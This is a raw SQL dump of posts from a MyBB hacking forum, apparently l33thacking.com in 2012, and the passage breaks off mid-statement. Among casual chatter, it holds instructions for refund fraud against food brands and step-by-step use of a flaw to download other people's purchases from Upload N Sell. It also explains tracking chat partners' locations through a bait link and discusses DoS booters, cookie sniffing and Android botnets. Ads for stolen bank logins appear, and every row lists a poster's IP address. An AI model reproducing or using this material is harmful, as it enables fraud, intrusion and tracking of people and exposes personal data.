`tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1320', '271', '1247', '53', 'RE: Minecraft/Rsps coding', '0', '82', 'iTzIpod', '1346255864', '[quote=\'HoverCatz\' pid=\'1247\' dateline=\'1346170143\'] Tried to connect with the client, it wont connect to the server. Cant login at all [/quote] The server was probably offline.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'c700ec374a28857353531211b585e512', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1321', '186', '638', '16', 'RE: SE razor?', '0', '61', 'NXK', '1346255940', 'If you\'re going to se a deathadder PM me, I have one and i can take pictures for you with the email you need and everything. I have never done any SEing with my deathadder. I also have released astro pid so all you need is a friend with the item you are trying to se. get them to take the pictures for you with your pid/email', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', '87e68ca7004fc6127aa2f491ddd1dad3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1322', '279', '0', '3', '[Bug] Awards are gone', '0', '82', 'iTzIpod', '1346256050', 'Not sure if it is a Bug, but I can\'t seem to see the awards anymore. @t3h jok3r, please fix this. :/ I miss my awards.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '1339d6f20f1174e3bf2dc21e93cb6e6a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1323', '247', '1319', '16', 'RE: [Free] [EBook] How to SE Pringles', '0', '82', 'iTzIpod', '1346256106', '[quote=\'NXK\' pid=\'1319\' dateline=\'1346255819\'] [quote=\'iTzIpod\' pid=\'1182\' dateline=\'1346109303\'] For me, I live in Canada so the tab is called Ask Us. And it works from there. But I think Kelloggs now owns Pringles. I didn\'t write this eBook sorry :/ I tried it 3 times and got it to work successfully. Sorry guys. [/quote] My fellow mod is canadian also? and iv always just used astro pid for pringles and told them my package had he airtight seal punctured. Ill give this a read though. [/quote] Canadians eh? :D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e38f6e286a888be28ecde7650eb40a4b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1324', '278', '1308', '7', 'RE: My first mybb theme [WIP]', '0', '61', 'NXK', '1346256162', 'I feel like it\'s too plain. But good attempt at your first one.', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', '82635dbe13581ce21f199d66660a3b7f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1325', '235', '1314', '48', 'RE: Experiences of MOD', '0', '82', 'iTzIpod', '1346256198', '[quote=\'t3h jok3r\' pid=\'1314\' dateline=\'1346253799\'] [quote=\'iTzIpod\' pid=\'1291\' dateline=\'1346206390\'] [quote=\'NXK\' pid=\'1271\' dateline=\'1346188889\'] [quote=\'t3h jok3r\' pid=\'1268\' dateline=\'1346187759\'] I feel jealous, because your guys username & star color and Userbar match and look beast. [/quote] I think just having the title admin wins bro. [/quote] Couldn\'t agree less. Being an Admin and on this awesome is better than anything in the world. Even owning it is like an awesome dream. I want to be an Admin one day. But chances of that is 0%. :/ [/quote] Uhh I agree. Every mod has 60% chances so 0% is too less. [/quote] Oh. But good luck finding that Admin @t3h jok3r!', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b293ff360e3f4d634b2b1b649c8451e4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1326', '191', '666', '15', 'RE: ProDos v1.0', '0', '82', 'iTzIpod', '1346256318', 'I don\'t think it matters @sirchamp and @HoverCatz. It still is a Dos that works.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '499f9b9dab718d9a3c5deeebc583a621', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1363', '293', '0', '16', 'How to SE fererro', '0', '154', 'fap', '1346370306', 'Go to you\'re ferrero (kinder bueno) country\'s website go to their contact us (email them) Say there was no creme filling or make up your own excuse. They should email you back saying sorry for the inconvienience and they will send you some chocolate ! :). There\'s such little steps because it is that easy.', '92.234.104.156', '1558866076', '0', '0', '0', '0', '1', '36d5414514553b3601b50b228b4bf12b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1328', '279', '1322', '3', 'RE: [Bug] Awards are gone', '0', '61', 'NXK', '1346256983', 'This, they are gone. I kinda like not having awards though. atleast for a month. It will keep people from award whoring and not stay HQ once they get the award they want.', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', 'dd0fce1bb279fdceebe831cad2f8ab79', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1329', '279', '1322', '3', 'RE: [Bug] Awards are gone', '0', '67', 'HoverCatz', '1346258614', 'Awards makes me feel like a \"Special user\". No awards makes me feel like a Normal member. Secondly, it makes all posts look better.', '178.74.56.137', '-1303758711', '1', '0', '0', '0', '1', '87986a730f0db81ea620ea83d7f52e2b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1330', '191', '1326', '15', 'RE: ProDos v1.0', '0', '67', 'HoverCatz', '1346259075', '[quote=\'iTzIpod\' pid=\'1326\' dateline=\'1346256318\'] I don\'t think it matters @sirchamp and @HoverCatz. It still is a Dos that works. [/quote] Thats correct, it does not matter. He was the one that quoted my first reply. I dont care what language its made in, only it works. And this works. If you still believe its Not in gamemaker, check out: [url=http://www.youtube.com/watch?v=aotVqDGjx4Y]Here[/url] Be sure you read the comments. Some people also says its Gamemaker.', '178.74.56.137', '-1303758711', '1', '0', '0', '0', '1', '24879dd8195fe95b648f7f1cbf635503', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1331', '198', '713', '21', 'RE: [Tutorial] Setting up your own web Booter[Source Included]', '0', '67', 'HoverCatz', '1346259585', 'Hey, im hosting my booter on [url=www.godaddy.com]here[/url] and they are not Offshore. I guess im just lucky, or?', '178.74.56.137', '-1303758711', '1', '0', '0', '0', '1', 'e1975a855153fe4b386ff1879d5193b5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1332', '29', '83', '15', 'RE: ???Italian DoS tool (Great for hitting sites offline)???', '0', '67', 'HoverCatz', '1346259799', '@iTzIpod When attacking a webpage, be sure you are able to go on other webpages at the same time, or ask a friend to check if the page really is down.', '178.74.56.137', '-1303758711', '1', '0', '0', '0', '1', 'cd8741a0eb0580df221a8b0cb2d43532', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1333', '11', '28', '15', 'RE: .EXE Booter Pack', '0', '67', 'HoverCatz', '1346259910', 'Hey. Do you still have the Shell checker? I have made one and released it on HF. Maybe its mine :P *Sorry for posting on old thread*', '178.74.56.137', '-1303758711', '1', '0', '0', '0', '1', '925854bafad39e607afa3e4042ebfeeb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1334', '164', '484', '28', 'RE: Experiences on your upgrade..', '0', '84', 'Thunder™', '1346260857', 'This Forums have already many active members and activity is good I hope i will contribute more :).', '111.91.95.188', '1868259260', '0', '0', '0', '0', '1', '14d86b7b5e20b099942adb8365dddc84', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1335', '281', '0', '84', 'Upload N Sell Exploit', '0', '84', 'Thunder™', '1346261031', 'Upload N Sell is a site that allows you to sell things smoothly via PayPal This exploit allows you to download the most recently purchased item for FREE Visit: http://uploadnsell.com/check-sale.php Copy the code that is displayed Visit: http://uploadnsell.com/download/ Paste the code you copied after \"/download/\" Download the file! Post thanks if u like this :).', '111.91.95.188', '1868259260', '0', '0', '0', '0', '1', '15c2d7d71e461a82c02b9aead27e9435', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1336', '282', '0', '55', '[Request] Youtube Accounts', '0', '84', 'Thunder™', '1346261212', 'Need some Youtube accounts for bots Thanks in advance.', '111.91.95.188', '1868259260', '0', '0', '0', '0', '1', '0c902ee20e7e8ea18f114ca1381d2ab5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1337', '283', '0', '14', 'Proxy List August 2012[Working]', '0', '84', 'Thunder™', '1346261697', 'Warning huge list This is useful for using it with your bots Enjoy guys Download Link :~ http://www.directmirror.com/files/0NNPMOCE', '111.91.95.188', '1868259260', '0', '0', '0', '0', '1', '9e9074b6c324545e39a7d3f938091b72', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1338', '284', '0', '7', 'Typing Speed Test', '0', '84', 'Thunder™', '1346261768', 'My typing speed [Img]http://speedtest.10fastfingers.com/badge/1_wpm_score_AN.png[/Img] Visit [url=http://speedtest.10fastfingers.com/]Typing speed[/url] and try !!! I suggest u all to check Out your typing Speed..', '111.91.95.188', '1868259260', '0', '0', '0', '0', '1', 'b1d559bbc86b5a44aa2adbfa87296ed5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1339', '285', '0', '12', 'How to track location of person on any chat box', '0', '84', 'Thunder™', '1346261829', 'How to track location of person on any chat box How to Track an other person on facebook chat room We will be track person by Location tracking codes, which you present in chat room land on page with good pictures. meanwhile, the other chat buddy\'s IP Address is stored in a database. IP Look Up identify Country, Near city, Local time, etc.. of the other buddy. [color=#FF0000]Step 1 :~[/color] First of all Sign in on [color=#1E90FF][url=http://www.chatrack.frihost.net]Click Here[/url][/color] [color=#FF0000]Step 2 :~[/color] Click on any one Landing page preview picture. from bottom of this page Select, \'Copy\' (ctrl+C) \'Tracking Code\' from that page. [color=#FF0000]Step 3 :~[/color]When you are in Live Chat with a buddy, Paste the track code in IM text box. Ask your chat buddy to click and see the \'Picture\' [color=#FF0000]Step 4 :~[/color]Give your chat buddy a little time to click and watch the \'picture\'. Now, click Track Result in \"this page\" and see your buddy\'s Location.', '111.91.95.188', '1868259260', '0', '0', '0', '0', '1', '88a722ce2af67fb8761d7ae3640133a3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1340', '249', '1057', '56', 'RE: Last person to reply, wins!', '0', '55', 'Baws', '1346262749', 'It is official guys... I won', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', '100238189b9348ba7fbcdfd682289b7e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1341', '265', '1184', '3', 'RE: Apathy Demoted', '0', '55', 'Baws', '1346262847', 'Too many people that don\'t know what grammar is in this thread...', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', 'a0558e6af33c220b9f6de8578a3baf49', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1342', '277', '1318', '11', 'RE: Any phreaking tutorials?', '0', '141', 'Bane™', '1346263823', '[quote=\'NXK\' pid=\'1318\' dateline=\'1346255675\'] There\'s alot of youtube videos that will show you the best things you can do with a rooted android like over clocking it, things like that. [/quote] I don\'t mean overclocking and all of that, cause I already did that. What I mean is methods to setup bot-nets through your android I know it\'s possible. I already have an app that pulls cookies on the network on that gives you access to what anyone is browsing at that moment.', '72.134.24.117', '1216747637', '0', '0', '0', '0', '1', '0e0144d937049233f4b84f314b3f7016', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1344', '279', '1322', '3', 'RE: [Bug] Awards are gone', '0', '1', 't3h jok3r', '1346270963', 'Please have a look at the thread below. http://l33thacking.com/showthread.php?tid=286', '41.174.3.249', '699270137', '1', '0', '0', '0', '1', 'aaa0abc8146f3a9b5445748097ded41f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1345', '281', '1335', '84', 'RE: Upload N Sell Exploit', '0', '67', 'HoverCatz', '1346273943', 'Thanks! :)', '178.74.56.137', '-1303758711', '1', '0', '0', '0', '1', 'c922602c92eb0a57dd4d03c644f08b19', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1346', '282', '1336', '55', 'RE: [Request] Youtube Accounts', '0', '82', 'iTzIpod', '1346287917', 'Can you give me an estimate of how much Just get a Youtube Account Creator bot and then use those? It\'s really fast, simple, and easy.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a4527714845b48ba5be16d0bae53477f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1347', '286', '1343', '3', 'RE: [Announcement] Awards and IP Log History Features', '0', '82', 'iTzIpod', '1346288091', 'Alright. Thanks for the notice. :/', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b9d74b94abe37480d5d3d61485c562fb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1348', '281', '1335', '84', 'RE: Upload N Sell Exploit', '0', '2', 'Apathy', '1346288421', 'Quite old now thanks anyway.', '173.206.130.181', '-1378975051', '0', '0', '0', '0', '1', '97612c82103bdcf95ad0678077bbd93d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1349', '249', '1057', '56', 'RE: Last person to reply, wins!', '0', '54', 'Sin Cara', '1346289880', '[quote=\'iTzIpod\' pid=\'1057\' dateline=\'1345991527\'] Title says it all. Whoever is the last person to reply to this thread, wins! [/quote] lol...it\'s your HQ post...?', '119.154.68.67', '2006598723', '1', '0', '0', '0', '1', 'e7d7111036dd9a9ef09339b2805dd465', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1350', '249', '1057', '56', 'RE: Last person to reply, wins!', '0', '82', 'iTzIpod', '1346292031', 'Oh dang! I just won!', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a9c8dfc86cf6748fdc914554b41fb213', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1351', '286', '1343', '3', 'RE: [Announcement] Awards and IP Log History Features', '0', '55', 'Baws', '1346293473', 'I was wondering what the problem was...', '98.176.49.100', '1655714148', '0', '0', '0', '0', '1', '6ba45caee88a736b97878cab3d233176', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1352', '287', '0', '41', 'steam account', '0', '84', 'Thunder™', '1346300993', 'Start Bid: $15.00 Buy It Now: $3w00.00 End Date: (when I see a good price) Payment Method :~ LR. Games: http://imgur.com/eEooq Shoot me a pm if ur intrested in buying :)', '111.91.75.51', '1868254003', '0', '0', '0', '0', '1', '4b6f8c01566229462dde0d3dd58d7735', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1353', '288', '0', '19', '[Junk]Joker delete this', '0', '67', 'HoverCatz', '1346331326', 'Sorry, posted in wrong section.', '178.74.56.137', '-1303758711', '1', '0', '67', '1346331627', '1', '2eceef6983961bade2fce39cab94857c', '0', '1346331627'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1354', '289', '0', '15', 'UploadNSell Exploit Program', '0', '67', 'HoverCatz', '1346331650', '[b]Hey. Thanks to [url=http://l33thacking.com/member.php?action=profile&uid=84]Thunder™[/url] i got the idea of making this program.[/b] [u][b]Download:[/b][/u] [lock][url=http://www.sendspace.com/file/d2g6ie][color=#1E90FF]Click Here[/color][/url][/lock] [u][b]Image:[/b][/u] [img]http://gyazo.com/be9fecb59998a9a80a334c66d225b915.png[/img] [u][b]Your rights:[/b][/u] [color=#32CD32]You are allowed to download and use this program.[/color] [color=#FF0000]You do not have my rights to decompile this, and use the way i did code it. Only if i ever share the code with you.[/color] NOTE: I may post updates with some new stuff on it later.', '178.74.56.137', '-1303758711', '1', '0', '1', '1352011902', '1', '45c58e7bf01d71a14b37e93a4686e9ff', '0', '1352011902'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1355', '288', '1353', '19', '[Junk]Joker delete this', '0', '20', 'JakeUS', '1346340893', 'This thread has been junked.', '24.59.243.229', '406582245', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1356', '141', '368', '9', 'RE: $30 per day ? Ne invest ? Do nothing ? Autopilot ? Very Easy ?', '0', '48', 'BurnsH4X', '1346342033', 'i think the ads from refreshing dont count anymore', '46.11.42.121', '772483705', '0', '0', '0', '0', '1', 'c291e952aaeb15b41bfb2edf6316b485', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1357', '281', '1335', '84', 'RE: Upload N Sell Exploit', '0', '82', 'iTzIpod', '1346348557', 'I\'ve seen this a couple times. But never tried it until now. Just downloaded a .txt file of a way to get free 1 month XBL.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'adb116fcaf9dbd26fd50443dcd9c1c7c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1358', '290', '0', '19', '[Junk][Junk]Our service is specialized on USA and CANADA dumps, but EUROPE/ASIA/WORLD dumps also', '0', '6', 'services', '1346348794', 'BANK LOGINS FOR SALE UK BANK LOGIN IN STOCK: Abbey Fresh // Alliance & Leicester // CapitalOne Bank HSBC UK // Halifax UK // LLOYDS USA BANK LOGIN IN STOCK: Bank Of America // CHASE // WELLSFARGO CITI BANK// HSBC// WACHOVIA ..................................................................................... Email : notion_services@ymail.com Ym : notion_services@ymail.com Icq : 600980136 Reply with Quote', '208.100.56.10', '-798738422', '0', '0', '0', '0', '1', '9a75347d9440b12b764fe5eeb640e865', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1359', '291', '0', '19', '[Junk]BANK LOGINS FOR SALE UK BANK LOGIN IN STOCK: Abbey Fresh // Alliance & Leicester //', '0', '6', 'services', '1346349114', 'BANK LOGINS FOR SALE UK BANK LOGIN IN STOCK: Abbey Fresh // Alliance & Leicester // CapitalOne Bank HSBC UK // Halifax UK // LLOYDS USA BANK LOGIN IN STOCK: Bank Of America // CHASE // WELLSFARGO CITI BANK// HSBC// WACHOVIA ..................................................................................... Email : notion_services@ymail.com Ym : notion_services@ymail.com Icq : 600980136 Reply with Quote', '208.100.56.10', '-798738422', '0', '0', '0', '0', '1', '01eae0526cdd8eea234901b75e589e2f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1360', '284', '1338', '7', 'RE: Typing Speed Test', '0', '82', 'iTzIpod', '1346350445', 'My result: [img]http://i.imgur.com/9NgIT.png[/img]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e5d3e0428abc7af0f8693b0c62b78845', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1361', '284', '1338', '7', 'RE: Typing Speed Test', '0', '1', 't3h jok3r', '1346366788', 'This is my result. [img]http://10fastfingers.com/speedtests/generate_screenshot_result/60_304_0_0_56_1_82.87_14282_83395[/img]', '41.174.16.235', '699273451', '1', '0', '0', '0', '1', 'be0aa58b8194d8fb527a91bfbef99772', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1364', '294', '0', '16', 'How to se pringles,monster,hersheys,duracell and stride', '0', '154', 'fap', '1346370620', 'Method on how to se pringles,monster,hersheys,duracell and stride :). download: http://www.mediafire.com/view/?oipiqzaphzdave8 enjoy ! :).', '92.234.104.156', '1558866076', '0', '0', '0', '0', '1', 'cce0b72416b44c7d795f90e911031847', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1365', '234', '977', '17', 'RE: Free E-Whoring packs website plus free PORN', '0', '154', 'fap', '1346370730', 'I\'d like this :). thanks in advance brother.', '92.234.104.156', '1558866076', '0', '0', '0', '0', '1', 'acc60fb9c5c674ea8eed6b3099ac443b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1366', '289', '1354', '15', 'RE: UploadNSell Exploit Program', '0', '1', 't3h jok3r', '1346372788', 'Thanks for the program, I didn\'t know about this thing before. Thanks to Thunder for letting us know about this website.', '41.174.6.118', '699270774', '1', '0', '0', '0', '1', '82623c578d70449c354055cebebc1343', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1367', '270', '1228', '7', 'RE: Hi everyone', '0', '5', 'Timmy', '1346373289', 'Welcome back to LH. How is your college going?', '41.174.6.118', '699270774', '1', '0', '0', '0', '1', '0fba460cc51cf69b86f9cc71b36d8143', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, 